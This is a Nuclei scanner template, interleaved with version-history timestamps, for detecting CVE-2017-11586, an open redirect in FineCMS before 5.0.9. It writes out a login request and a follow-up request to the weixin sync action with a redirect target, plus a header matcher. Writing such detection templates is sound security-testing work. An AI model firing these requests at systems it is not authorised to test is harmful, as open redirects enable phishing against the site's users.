nuclei-templates/http/cves/2017/CVE-2017-11586.yaml

43 lines
1.3 KiB
YAML
Raw Normal View History

2022-08-07 07:11:46 +00:00
id: CVE-2017-11586
info:
name: FineCMS <5.0.9 - Open Redirect
2022-08-07 07:11:46 +00:00
author: 0x_Akoko
severity: medium
2022-08-26 09:10:33 +00:00
description: |
FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-08-07 07:11:46 +00:00
reference:
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
2022-08-26 09:10:33 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-11586
2022-08-07 07:11:46 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-08-07 07:11:46 +00:00
cve-id: CVE-2017-11586
cwe-id: CWE-601
2022-08-26 09:10:33 +00:00
metadata:
max-request: 2
verified: "true"
2022-08-26 09:10:33 +00:00
tags: cve,cve2017,redirect,finecms
2022-08-07 07:11:46 +00:00
http:
2022-08-26 09:10:33 +00:00
- raw:
- |
POST /index.php?s=member&c=login&m=index HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2022-08-07 07:11:46 +00:00
2022-08-26 09:10:33 +00:00
back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1
2022-08-07 07:11:46 +00:00
2022-08-26 09:10:33 +00:00
- |
GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
2022-08-07 07:11:46 +00:00
matchers:
- type: regex
part: header
2022-08-26 09:10:33 +00:00
regex:
- 'Refresh:(.*)url=http:\/\/interact\.sh'
# Enhanced by mp on 2022/10/12